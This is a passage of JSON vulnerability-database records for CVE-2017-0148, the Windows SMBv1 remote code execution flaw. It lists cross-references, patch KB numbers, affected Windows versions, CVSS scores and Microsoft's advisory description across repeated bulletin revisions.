"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", 
"KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 
Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
"KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", 
"kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T14:49:48", "differentElements": ["msAffectedSoftware"], "edition": 63}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": 
{"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T16:52:15", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": 
"packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012216", "KB4012213", "KB4012215", "KB4013198", "KB4012212", "KB3205409", "KB3213986", "KBMS16-110, 3187754", "KB4013429", "KB3210720", "KB4012214", "KB3212646", "KB4012598", "KB4012217", "KB3210721", "KB3177186", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": 
"2021-09-19T16:52:15", "differentElements": ["msAffectedSoftware"], "edition": 64}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": 
